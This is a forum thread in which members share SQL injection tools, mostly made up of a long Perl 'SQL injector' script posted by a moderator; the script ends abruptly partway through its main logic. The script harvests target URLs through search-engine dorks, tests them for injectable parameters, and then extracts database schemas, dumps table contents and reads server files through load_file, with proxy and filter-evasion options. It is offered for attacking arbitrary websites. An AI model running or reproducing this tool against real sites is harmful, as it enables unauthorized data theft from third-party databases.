IT Security Team  
10-11-2009, 12:02 AM   #1
M3hr@n.S (Site Administrator)
SQL Injection Tools Reference

In this thread we will try to introduce the well-known SQL Injection tools.
Friends, please help out as well, so that this thread becomes one of the reference sources for SQLi tools.

Thanks
10-11-2009, 12:13 AM   #2
M3hr@n.S (Site Administrator)
The Sqlmap tool

It is one of the best tools for extracting data from MySQL, Oracle, PostgreSQL and Microsoft SQL databases, and it makes injection very easy.
It is open source, written in Python, and can also be used on different operating systems.

To get the program and its source, as well as more detailed information, see here.

Good luck


10-11-2009, 05:32 PM   #3
homay (Forum Moderator)
bsqlbf-v2.1

This tool is very well suited to Blind injection.
I had posted it before.

It supports the following databases:
MS-SQL
MYSQL
POSTGRES
ORACLE

Videos, documents and tools for Blind Sql Injection

Edited by homay : 07-07-2010 at 11:20 AM
10-11-2009, 06:59 PM   #4
h4ckrout (New Member)

Thanks to dear Mehran
for opening this important thread. We will also try to post important and better tools for friends, so that we may earn your favor.
This program, known by the name PRIAMOS, has a graphical environment for extracting information from our target; it brings us its database, the tables and ...
[Only site members are able to see links]
10-11-2009, 10:38 PM   #5
hadi85 (Active Member)

Quote:
Originally posted by h4ckrout
Thanks to dear Mehran
for opening this important thread. We will also try to post important and better tools for friends, so that we may earn your favor.
This program, known by the name priamos, has a graphical environment for extracting information from our target; it brings us its database, the tables and ...
[Only site members are able to see links]

The download link has a problem.
It would be very good if you also gave a little explanation about these tools.

Thanks

Edited by hadi85 : 10-11-2009 at 10:51 PM
10-12-2009, 12:05 AM   #6
h4ckrout (New Member)

Dear friend, the link has no problem. The dear admins can also run a test to see whether it has a problem or not; for me it has no problem.
As for the second question, dear friend, we will try, that is, I and the dear admins, to explain as far as we are able, but you also have to work on them a bit yourself.
In this thread we put up posts that are useful in SQL attacks, for example a tool for testing SQL attacks on a target.
If you want to get more information, you can go to the articles section, or to Google. The tool I posted
is an auto-injector that, after being given the target, starts returning the database information; for example, if you are familiar with Access or SQL, there are tables ... which are our information.
If you did not understand, say so and I will explain it better for you.
10-12-2009, 12:08 AM   #7
hadi85 (Active Member)

Thanks, I was able to download it now.
10-17-2009, 04:12 PM   #8
777 (Forum Moderator)

An injector in Perl, both for SQLi and for MySQLi

Code:
#!/usr/bin/perl
#
# OOO  OOO           OO    OO        OO
#  OO   O             O     O         O
#  O O  O  OO  OO     O     O        O O   OO OOO   OOOO    OOOOO
#  O  O O   O   O     O     O        OOO    OO     OOOOOO       O
#  O   OO   O   O     O     O       O   O   O      O       OOOOOO
# OOO  OO   OOOOO   OOOOO OOOOO    OOO OOO OOOOO    OOOOO  OOOO OO
################################################################################################################################
#                                             SQL INJECTOR 
################################################################################################################################

#proxy support
#URl Extractor + vuln scanner & checker



use LWP::UserAgent;
use HTTP::Request;

sub help
{
     system('cls');
     system('title SQL InJeCtoR v2.0');
     print "\n\n-----------------------------------\n";
     print "[!] Usage : perl $0 <option>\n";
     print "\n\n--/// MySQL\n";
     print "     --mysqlcol         MySQL column length calculator            MySQL v4/5\n";
     print "     --mysqldetails     MySQL target website db global infos      MySQL v4/5\n";
     print "     --mysqlschema      MySQL Full Schema Extractor               MySQL v5\n";
     print "     --mysqldump        MySQL Data Dump                           MySQL v4/5\n";
     print "     --mysqlfile        MySQL load_file fuzzer                    MySQL v4/5\n";
     print "     --mysqltblfuzz     MySQL Table_name Fuzzer                   MySQL v4\n";
     print "     --mysqlcolfuzz     MySQL Column_name Fuzzer                  MySQL v4\n";
	 print "\n\n--/// MsSQL\n";
	 print "     --mssqldetails      MsSQL DB global info\n";
	 print "     --mssqltable        MsSQL Tables Extractor\n";
	 print "     --mssqlcolumns      MsSQL Columns Extractor\n";
	 print "     --mssqldump         MsSQL Columns Extractor\n";
	 print "\n\n--/// Vulunerability Scanner\n";
	 print "     --dork              URL Extractor , SQL Vulnerability's Scanner & checker\n";
	 print "\n\n--/// Options\n";
	 print "     --proxy             define a proxy to use\n";
	 print "     --listfile          list of columns or tables to use in fuzz or load_file files list\n";
	 print "     --output            save injection or scan result in an outside file\n";
	 print "     --table             table to use in dumping data or in tbles extract\n";
	 print "     --column            column to use in dumping data or in column extract\n";
	 print "     --help              print this help text :P\n";
     exit();
}

sub variables
{
     my $i=0;
     foreach (@ARGV)
     {
         if ($ARGV[$i] eq "--dork"){$search_dork = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqlcol"){$mysql_count_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqldetails"){$mysql_details_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqlschema"){$mysql_schema_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqldump"){$mysql_dump_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqltblfuzz"){$mysql_fuzz_table = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqlcolfuzz"){$mysql_fuzz_column = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqlfile"){$mysql_load_file = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mssqldetails"){$mssql_details_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mssqltable"){$mssql_table_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mssqlcolumn"){$mssql_column_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mssqldump"){$mssql_dump_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--column"){$sql_dump_column = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--table"){$sql_dump_table = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--evasion"){$evasion = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--output"){$vulnfile = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--proxy"){$proxy = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--listfile"){$word_list = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--help"){&help}
         $i++;
     }
}

sub main
{
     system('cls');
     system('title SQL InJeCtoR');
	 if (@ARGV<1){print "[!] For Help : perl $0 --help\n\n\n" ;}
}

sub vulnscanner
{
     checkgoogle();
     googlescan($search_dork);
     askscan($search_dork);
}

sub checkgoogle
{
	 my $request   = HTTP::Request->new(GET => "http://www.google.com/search?hl=en&q=$search_dork&btnG=Search&start=10");
     my $useragent = LWP::UserAgent->new(agent => 'FAST-WebCrawler/3.3');
     $useragent->proxy("http", "http://$proxy/") if defined($proxy);
     my $response  = $useragent->request($request) ;
     my $result    = $response->content;
	 if ($result   =~ m/if you suspect that your computer or network has been infected/i){print "[!] You Have Been Banned From Google Search :( \n";exit()}
}		 

sub googlescan
{
     my $dork  = $_[0];
     for ($i=0;$i<200;$i=$i+10)
     {
         my $request   = HTTP::Request->new(GET => "http://www.google.com/search?hl=en&q=$dork&btnG=Search&start=$i");
         my $useragent = LWP::UserAgent->new(agent => 'FAST-WebCrawler/3.3');
	     $useragent->proxy("http", "http://$proxy/") if defined($proxy);
         my $response  = $useragent->request($request) ;
         my $result    = $response->content;
         while ($result =~ m/class=r><a href=\"(.*?)\" class=l>/g )
		 {
		     print "[!] Trying to fuzz $1\n";	 
		     checkvuln($1)
		 }
     }				  
}

sub askscan
{
     my $dork  = $_[0];
     for ($i=0;$i<20;$i++)
     {
         my $request   = HTTP::Request->new(GET => "http://www.ask.com/web?q=page.php?id=&qsrc=0&o=0&l=dir&q=$dork&page=$i&jss=");
         my $useragent = LWP::UserAgent->new(agent => 'FAST-WebCrawler/3.3');
		 $useragent->proxy("http", "http://$proxy/") if defined($proxy);
         my $response  = $useragent->request($request) ;
         my $result    = $response->content;
         while ($result =~ m/<span id=\"r(.*)_u\" class=\"(.*)\">(.*)<\/span>/gi)
		 {
			 my $askurl ="http://".$3 ;
			 print "[!] Trying to fuzz $askurl\n";
			 checkvuln($askurl);
		 }
	 }
}

sub checkvuln
{
     my $scan_url   = $_[0];
     my $link       = $scan_url.'0+order+by+9999999--';
	 my $ua         = LWP::UserAgent->new();
	 $ua->proxy("http", "http://$proxy/") if defined($proxy);
     my $req        = $ua->get($link);
	 my $fuzz       = $req->content;
	 if ($fuzz =~ m/You have an error in your SQL syntax/i || $fuzz =~ m/Query failed/i || $fuzz =~ m/SQL query failed/i || $fuzz =~ m/mysql_fetch_/i || $fuzz =~ m/mysql_fetch_array/i || $fuzz =~ m/mysql_num_rows/i || $fuzz =~ m/The used SELECT statements have a different number of columns/i )
	 {
	     print "[!] MySQL Vulnerable     -> $scan_url\n";
		 if (defined($vulnfile))
         { 
		     push (@mysqlvuln,"$scan_url\n");
		 }
	 }
	 elsif ($fuzz =~ m/ODBC SQL Server Driver/i)
	 {
	     print "[!] MsSQL Vulnerable     -> $scan_url\n";
		 if (defined($vulnfile))
         { 
		     push (@mssqlvuln,"$scan_url\n");
		 }
	 }
	 elsif ($fuzz =~ m/Microsoft JET Database/i || $fuzz =~ m/ODBC Microsoft Access Driver/i )
	 {
	     print "[!] MS Access Vulnerable -> $scan_url\n";
		 if (defined($vulnfile))
         { 
		     push (@accessvuln,"$scan_url\n");
		 }
	 }
}

sub mysqlcount
{
     my $site   = $_[0];
     my $ev     = $_[1];
     my $null   = "09+and+1=" ;
     my $code   = "0+union+select+" ;
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
     my $injection = $site.$null.$code."0",$com ;
     my $useragent = LWP::UserAgent->new();
	 $useragent->proxy("http", "http://$proxy/") if defined($proxy);
     my $response  = $useragent->get($injection);
     my $result   = $response->content;
     if( $result =~ m/You have an error in your SQL syntax/i || $result =~ m/Query failed/i || $result =~ m/SQL query failed/i || $result =~ m/mysql_fetch_/i || $result =~ m/mysql_fetch_array/i || $result =~ m/mysql_num_rows/i || $result =~ m/The used SELECT statements have a different number of columns/i )
     {
          print "\n[!] This Website Is Vulnerable\n" ;
	      print "[+] Working On It\n";
     }
     else
     {
         print "\n[!] This WebSite Is Not SQL Vulnerable !\n";
         exit();
     }
     for ($i = 0 ; $i < 100 ; $i ++)
     {
	     $col.=','.$i;
	     $specialword.=','."0x617a38387069783030713938";
         if ($i == 0)
         {
             $specialword = '' ; 
             $col = '' ;
         }
         $sql=$site.$null.$code."0x617a38387069783030713938".$specialword.$com ;
	     $ua = LWP::UserAgent->new();
		 $ua->proxy("http", "http://$proxy/") if defined($proxy);
	     $rq = $ua->get($sql);
		 $response = $rq->content;
	     if($response =~ /az88pix00q98/)
         {
             $i ++;			 
             print "\n[!] MySQL Column Count Finished\n" ;
             print "[!] This WebSite Have $i Columns\n" ;
             $sql=$site.$null.$code."0".$col.$com ;
		     print "=> ".$sql ."\n\n";	
			 if (defined($vulnfile))
			 {
			     open(vuln_file,">>$vulnfile") ;
                 print vuln_file "Target Host : $site\n";
                 print vuln_file "Evasion     : $ev\n";
                 print vuln_file "Col length  : $i\n";
                 print vuln_file "Injection   : $sql\n";
                 close(vuln_file);
                 print "[+] Result Saved to $vulnfile\n";
			 }
             exit () ;		 
         }	
     }
}

sub mysqldetails
{
     my $site   = $_[0];
     my $ev     = $_[1];
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
     my $selection = "concat(0x617a38387069783030713938,version(),0x617a38387069783030713938,database(),0x617a38387069783030713938,user(),0x617a38387069783030713938)";
     print "\n[+] Info Getting, Started Please Wait ....\n\n";
	 if ($site =~ /(.*)NullArea(.*)/i)
     {
         my $newlink = $1.$selection.$2.$com;
         my $ua = LWP::UserAgent->new();
		 $ua->proxy("http", "http://$proxy/") if defined($proxy);
	     my $request = $ua->get($newlink);
	     my $content = $request->content;
         if ($content =~ /az88pix00q98(.*)az88pix00q98(.*)az88pix00q98(.*)az88pix00q98/)
         {
	         print "[!] Database Version  : $1\n";
             print "[!] Database Name     : $2\n";						  
             print "[!] DB UserName       : $3\n";						  
			 if (defined($vulnfile))
			 {
			     open(vuln_file,">>$vulnfile") ;
                 print vuln_file "[!] Target            : $site\n";
                 print vuln_file "[!] evasion           : $ev\n";
                 print vuln_file "[!] Database Version  : $1\n";
                 print vuln_file "[!] Database Name     : $2\n";
                 print vuln_file "[!] DB UserName       : $3\n";
                 close(vuln_file);
                 print "\n[+] Result Saved to $vulnfile\n";
			 }
             exit () ;			 
		 }
		 else
		 {
		     print "[!] Failed\n";
			 exit () ;	
		 }
	 }
	 else 
	 {
	     print "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
         exit () ;			 
	 }
}

sub mysqlschema
{
     my $site   = $_[0];
     my $ev     = $_[1];
	 my @schema=();
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
     my $selection = "concat(0x617a38387069783030713938,column_name,0x617a38387069783030713938,table_name,0x617a38387069783030713938,table_schema,0x617a38387069783030713938)";
     print "\n[+] Schema Extracting, Started Please Wait ....\n\n";
	 if ($site =~ /(.*)NullArea(.*)/i)
     {
		 print "[+] Column :|: Table :|: Database\n"; 
         for ($i=0;  $i<=1500 ; $i++ )
         {
	         $newstring = $1.$selection.$2.$add.'from'.$add.'information_schema.columns'.$add.'LIMIT'.$add.$i.','.'1'.$com;
             my $ua = LWP::UserAgent->new();
			 $ua->proxy("http", "http://$proxy/") if defined($proxy);
	         my $request = $ua->get($newstring);
	         my $content = $request->content;
             if ($content =~ /az88pix00q98(.*)az88pix00q98(.*)az88pix00q98(.*)az88pix00q98/)
             { 
				 print "[!] $1 :|: $2 :|: $3 \n";
				 push (@schema,"$1 :|: $2 :|: $3 \n");
		     }
	     }
		 if (defined($vulnfile))
		 {
		     open(vuln_file,">>$vulnfile") ;
             print vuln_file "[!] Target            : $site\n";
             print vuln_file "[!] evasion           : $ev\n";
             print vuln_file "[!] Schema  :: ----     \n\n\n";
		     $i=0;
		     foreach(@schema)
		     {
                 print vuln_file $schema[$i]."\n";
			     $i++;
		     }
             print "\n[+] Result Saved to $vulnfile\n";
		 }
	 }
	 else 
	 {
	     print "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
         exit () ;			 
	 }
}

sub mysqldump
{
     my $site   = $_[0];
     my $colm   = $_[1];
     my $tble   = $_[2];
     my $ev     = $_[3];
	 print "[+] Table name $tble\n";
	 print "[+] Column name $colm\n";
	 my @dumper=();
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
     my $selection = "concat(0x617a38387069783030713938,$colm,0x617a38387069783030713938)";
     print "\n[+] Data Dump Started Please Wait ....\n\n";
	 if ($site =~ /(.*)NullArea(.*)/i)
     {
	     $i=0;
		 print "[+] Dumped Data : //// \n"; 
         do
         {
	         $newstring = $1.$selection.$2.$add.'from'.$add.$tble.$add.'LIMIT'.$add.$i.','.'1'.$com;			 
             my $ua = LWP::UserAgent->new();
			 $ua->proxy("http", "http://$proxy/") if defined($proxy);
	         my $request = $ua->get($newstring);
	         my $content = $request->content;
             if ($content =~ /az88pix00q98(.*)az88pix00q98/)
             { 
				 print "[!] $1 \n";
                 push(@dumper,"$1\n");
		     }
			 $i++;
	     }
		 while ($i<1500);
		 if (defined($vulnfile))
	     {
		     open(vuln_file,">>$vulnfile") ;
             print vuln_file "[!] Target            : $site\n";
             print vuln_file "[!] evasion           : $ev\n";
             print vuln_file "[!] Dumped Column     : $colm\n";
             print vuln_file "[!] Dumped Table      : $tble\n";
             print vuln_file "[!] Data  :: ----     \n\n\n";
		     $i=0;
		     foreach(@dumper)
		     {
                 print vuln_file $dumper[$i]."\n";
			     $i++;
		     }
             close(vuln_file);
             print "\n[+] Result Saved to $vulnfile\n";
		 }
	 }
	 else 
	 {
	     print "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
         exit () ;			 
	 }
}

sub mysqlfuzztable
{
     my $site    = $_[0];
     my $ev      = $_[1];
     my $filelst = $_[2];
	 print "[+] File List $filelst\n";
	 my @tbles_possible=();
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
	 open (word_list_file,"$filelst") or die "[!] Couldnt Open WordList File $!\n";
	 @word_list_search = <word_list_file> ;
     print "\n[+] Fuzzing Table, Started Please Wait ....\n\n";
	 if ($site =~ /(.*)NullArea(.*)/i)
     {
		 print "[+] Fuzz Result : //// \n\n";
         $i=0;		 
         foreach (@word_list_search)
         {
		     print "[!] Trying To Fuzz Table_name with $word_list_search[$i]";
	         $newstring = $1."0x617a38387069783030713938".$2.$add.'from'.$add.$word_list_search[$i].$com;				 
             my $ua = LWP::UserAgent->new();
			 $ua->proxy("http", "http://$proxy/") if defined($proxy);
	         my $request = $ua->get($newstring);
	         my $content = $request->content;
             if ($content =~ /az88pix00q98/)
             { 
				 print "\n[!] Found Table ! $word_list_search[$i] \n";
                 push(@tbles_possible,"$word_list_search[$i]\n");
		     }
			 $i++;
	     }
		 if (defined($vulnfile))
	     {
		     open(vuln_file,">>$vulnfile") ;
             print vuln_file "[!] Target            : $site\n";
             print vuln_file "[!] evasion           : $ev\n";
             print vuln_file "[!] Wordlist          : $filelst\n";
             print vuln_file "[!] Tbles Found  :: ----     \n\n\n";
		     $i=0;
		     foreach(@tbles_possible)
		     {
                 print vuln_file $tbles_possible[$i]."\n";
			     $i++;
		     }
             close(vuln_file);
             print "\n[+] Result Saved to $vulnfile\n";
		 }
	 }
	 else 
	 {
	     print "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
         exit () ;			 
	 }
}

sub mysqlfuzzcolumn
{
     my $site    = $_[0];
     my $ev      = $_[1];
     my $filelst = $_[2];
	 my $tablext = $_[3];
	 print "[+] File List $filelst\n";
	 print "[+] Table To Fuzz Columns $tablext\n";
	 my @cols_possible=();
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
	 open (word_list_file,"$filelst") or die "[!] Couldnt Open WordList File $!\n";
	 @word_list_search = <word_list_file> ;
     print "\n[+] Fuzzing Column, Started Please Wait ....\n\n";
	 if ($site =~ /(.*)NullArea(.*)/i)
     {
		 print "[+] Fuzz Result : //// \n\n";
         $i=0;		 
         foreach (@word_list_search)
         {
		     print "[!] Trying To Fuzz Column_name with $word_list_search[$i]";
	         $newstring = $1."concat(0x617a38387069783030713938,$word_list_search[$i])".$2.$add.'from'.$add.$tablext.$com;				 
             my $ua = LWP::UserAgent->new();
			 $ua->proxy("http", "http://$proxy/") if defined($proxy);
	         my $request = $ua->get($newstring);
	         my $content = $request->content;
             if ($content =~ /az88pix00q98/)
             { 
				 print "\n[!] File Column ! $word_list_search[$i] \n";
                 push(@cols_possible,"$word_list_search[$i]\n");
		     }
			 $i++;
	     }
		 if (defined($vulnfile))
	     {
		     open(vuln_file,">>$vulnfile") ;
             print vuln_file "[!] Target            : $site\n";
             print vuln_file "[!] evasion           : $ev\n";
             print vuln_file "[!] Wordlist          : $filelst\n";
             print vuln_file "[!] Cols Found  :: ----     \n\n\n";
		     $i=0;
		     foreach(@cols_possible)
		     {
                 print vuln_file $cols_possible[$i]."\n";
			     $i++;
		     }
             close(vuln_file);
             print "\n[+] Result Saved to $vulnfile\n";
		 }
	 }
	 else 
	 {
	     print "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
         exit () ;			 
	 }
}

sub mysqlfile
{
     my $site    = $_[0];
     my $ev      = $_[1];
     my $filelst = $_[2];
	 print "[+] File List $filelst\n";
	 my @cols_possible=();
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
	 open (word_list_file,"$filelst") or die "[!] Couldnt Open WordList File $!\n";
	 @word_list_search = <word_list_file> ;
     print "\n[+] File Fuzz, Started Please Wait ....\n\n";
	 if ($site =~ /(.*)NullArea(.*)/i)
     {
		 print "[+] Fuzz Result : //// \n\n";
         $i=0;		 
         foreach (@word_list_search)
         {
	         $newstring = $1."concat(0x617a38387069783030713938,load_file('$word_list_search[$i]'))".$2.$com;			 
             my $ua = LWP::UserAgent->new();
			 $ua->proxy("http", "http://$proxy/") if defined($proxy);
	         my $request = $ua->get($newstring);
	         my $content = $request->content;
			 print "[!] Trying To Fuzz Load_File with $word_list_search[$i]";
             if ($content =~ m/az88pix00q/i)
             { 
				 print "\n[!] Found File ! $word_list_search[$i] \n";
                 push(@cols_possible,"$word_list_search[$i]\n");
		     }
			 $i++;
	     }
		 if (defined($vulnfile))
	     {
		     open(vuln_file,">>$vulnfile") ;
             print vuln_file "[!] Target            : $site\n";
             print vuln_file "[!] evasion           : $ev\n";
             print vuln_file "[!] Wordlist          : $filelst\n";
             print vuln_file "[!] Files Found  :: ----     \n\n\n";
		     $i=0;
		     foreach(@cols_possible)
		     {
                 print vuln_file $cols_possible[$i]."\n";
			     $i++;
		     }
             close(vuln_file);
             print "\n[+] Result Saved to $vulnfile\n";
		 }
	 }
	 else 
	 {
	     print "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
         exit () ;			 
	 }
}

sub mssqldetails
{
     my $site   = $_[0];
     my $ev     = $_[1];
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
	 print "\n[+] Getting Infos, Started Please Wait ....\n\n";
     $version = "convert(int,(select".$add."\@\@version));--" ;
     $system_user = 'convert(int,(select'.$add.'system_user));--';
     $db_name = 'convert(int,(select'.$add.'db_name()));--';
     $servername = 'convert(int,(select'.$add.'@@servername));--' ;
     my $injection = $site.$version ;
     my $request   = HTTP::Request->new(GET=>$injection);
     my $useragent = LWP::UserAgent->new();
     $useragent->timeout(10);
     my $response  = $useragent->request($request)->as_string ;
     if ($response =~ /.*?value\s'/)
	 {
	     print "[+] This Website Is SQL Vulnerable ..\n";
	     print "[+] Working On It ..\n";
         $ver = $1 if ($response =~ /.*?value\s'(.*?)'\sto.*/sm) ;
	     print "\n[!] MsSQL Version Is :";
	     print "\n\n => $ver"	;
	     my $injection = $site.$system_user ;
         my $request   = HTTP::Request->new(GET=>$injection);
         my $useragent = LWP::UserAgent->new();
         $useragent->timeout(10);
         my $response  = $useragent->request($request)->as_string ;
	     $system_user = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
         print "\n[!] MsSQL System_User Is    :";
	     print "  $system_user  "	;
         my $injection = $site.$db_name ;
         my $request   = HTTP::Request->new(GET=>$injection);
         my $useragent = LWP::UserAgent->new();
         $useragent->timeout(10);
         my $response  = $useragent->request($request)->as_string ;
	     $db_name = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
         print "\n[!] MsSQL Database Name Is  :";
	     print "  $db_name  "	;		  
	     my $injection = $site.$servername ;
         my $request   = HTTP::Request->new(GET=>$injection);
         my $useragent = LWP::UserAgent->new();
         $useragent->timeout(10);
         my $response  = $useragent->request($request)->as_string ;
	     $servername = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
         print "\n[!] MsSQL Server Name Is    :";
	     print "  $servername  "	;	
         exit ();					   
	 }
	 else 
	 {
	     system ("cls");
	     print "\n[!] This Website Is Not SQL Vulnerable !";
	     exit();
	}
}

sub mssqltable
{
     my $site   = $_[0];
     my $ev     = $_[1];
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
	 print "\n[+] Table Extracting, Started Please Wait ....\n\n";
     $table = "convert(int,(select".$add."top".$add."1".$add."table_name".$add."from".$add."information_schema.tables));--";
     $data = "'Ws65qd798sqd9878'";
	 print "[!] Tables : //// \n\n"; 
     for ($i;$i<1500;$i++)
     {
         my $injection = $site.$table ;
         my $useragent = LWP::UserAgent->new();
		 $ua->proxy("http", "http://$proxy/") if defined($proxy);
         my $request   = $useragent->get($injection);
         my $response  = $request->content;
         if ($response =~ /.*?value\s'(.*?)'\sto.*/sm)
         {
	         print "[+] ".$1."\n";
			 push (@exttbles,$1);
	         $start = "(";
	         $data .= ",'$1'";
	         $end   = ")";
	         $total = $start.$data.$end;
	         $table = "convert(int,(select".$add."top".$add."1".$add."table_name".$add."from".$add."information_schema.tables".$add."where".$add."table_name".$add."not".$add."in".$add."$total));--";	
         }
     }
	 if (defined($vulnfile))
     {
		 open(vuln_file,">>$vulnfile") ;
         print vuln_file "[!] Target            : $site\n";
         print vuln_file "[!] evasion           : $ev\n";
         print vuln_file "[!] Data  :: ----     \n\n\n";
		 $i=0;
		 foreach(@exttbles)
		 {
             print vuln_file $exttbles[$i]."\n";
			 $i++;
		 }
         close(vuln_file);
         print "\n[+] Result Saved to $vulnfile\n";
	 }
}

sub mssqlcolumn
{
     my $site   = $_[0];
     my $ev     = $_[1];
	 my $tblextrct = $_[2];
	 print "[+] Table To Extract From $tblextrct\n";
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
	 print "\n[+] Table Extracting, Started Please Wait ....\n\n";
	 $data = "'Ws65qd798sqd9878'";
     $table = "convert(int,(select".$add."top".$add."1".$add."column_name".$add."from".$add."information_schema.columns".$add."where".$add."table_name"."="."'$tblextrct'".$add."And".$add."column_name".$add."not".$add."in".$add."($data)"."));--";
	 print "[!] Columns : //// \n\n"; 
     for ($i;$i<1500;$i++)
     {
         my $injection = $site.$table ;
         my $useragent = LWP::UserAgent->new();
		 $ua->proxy("http", "http://$proxy/") if defined($proxy);
         my $request   = $useragent->get($injection);
         my $response  = $request->content;
         if ($response =~ /.*?value\s'(.*?)'\sto.*/sm)
         {
	         print "[+] ".$1."\n";
			 push (@extcols,$1);
	         $start = "(";
	         $data .= ",'$1'";
	         $end   = ")";
	         $total = $start.$data.$end;
	         $table = "convert(int,(select".$add."top".$add."1".$add."column_name".$add."from".$add."information_schema.columns".$add."where".$add."table_name"."="."'$tblextrct'".$add."And".$add."column_name".$add."not".$add."in".$add."$total"."));--";	
         }
     }
	 if (defined($vulnfile))
     {
		 open(vuln_file,">>$vulnfile") ;
         print vuln_file "[!] Target            : $site\n";
         print vuln_file "[!] evasion           : $ev\n";
         print vuln_file "[!] Data  :: ----     \n\n\n";
		 $i=0;
		 foreach(@extcols)
		 {
             print vuln_file $extcols[$i]."\n";
			 $i++;
		 }
         close(vuln_file);
         print "\n[+] Result Saved to $vulnfile\n";
	 }
}

sub mssqldump
{
     my $site   = $_[0];
     my $ev     = $_[1];
	 my $tblextrct = $_[2];
	 my $colmextrct = $_[3];
	 print "[+] Table  : $tblextrct\n";
	 print "[+] Column : $colmextrct\n";
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
	 print "\n[+] Table Extracting, Started Please Wait ....\n\n";
	 $data = "'Ws65qd798sqd9878'";
     $table = "convert(int,(select".$add."top".$add."1".$add."$colmextrct".$add."from".$add."$tblextrct".$add."where".$add."$colmextrct".$add."not".$add."in".$add."($data)"."));--";
	 print "[!] Columns : //// \n\n"; 
     for ($i;$i<1500;$i++)
     {
         my $injection = $site.$table ;
         my $useragent = LWP::UserAgent->new();
		 $ua->proxy("http", "http://$proxy/") if defined($proxy);
         my $request   = $useragent->get($injection);
         my $response  = $request->content;
         if ($response =~ /.*?value\s'(.*?)'\sto.*/sm)
         {
	         print "[+] ".$1."\n";
			 push (@dumpdata,$1);
	         $start = "(";
	         $data .= ",'$1'";
	         $end   = ")";
	         $total = $start.$data.$end;
	         $table = "convert(int,(select".$add."top".$add."1".$add."$colmextrct".$add."from".$add."$tblextrct".$add."where".$add."$colmextrct".$add."not".$add."in".$add."$total"."));--";
         }
     }
	 if (defined($vulnfile))
     {
		 open(vuln_file,">>$vulnfile") ;
         print vuln_file "[!] Target            : $site\n";
         print vuln_file "[!] evasion           : $ev\n";
         print vuln_file "[!] Data  :: ----     \n\n\n";
		 $i=0;
		 foreach(@dumpdata)
		 {
             print vuln_file $dumpdata[$i]."\n";
			 $i++;
		 }
         close(vuln_file);
         print "\n[+] Result Saved to $vulnfile\n";
	 }
}

variables();
main();

if (defined($search_dork))
{
     print "[+] Vulnerability Scan\n" ;
     print "[+] Dork : $search_dork\n\n\n" ;
     vulnscanner();
	 if (defined($vulnfile))
     {
         open(vuln_file,">>$vulnfile") ;
         print vuln_file @mysqlvuln;
         print vuln_file @mssqlvuln;
         print vuln_file @accessvuln;
         close(vuln_file);
         print "[+] Result Saved to $vulnfile\n";
         exit();
     }
} 

if (defined($mysql_count_target))
{
     print "[+] MySQL Column Counter\n\n" ;
     print "[+] Target : $mysql_count_target\n" ;
     if ($evasion eq '/*')
	 {
	     print "[+] Evasion : /**/\n" ;
	 }
     elsif ($evasion eq '%20')
	 {
	     print "[+] Evasion : %20\n" ;
	 }
	 else
	 {
	     print "[+] Evasion : --\n" ;
		 $evasion = "--"
	 }
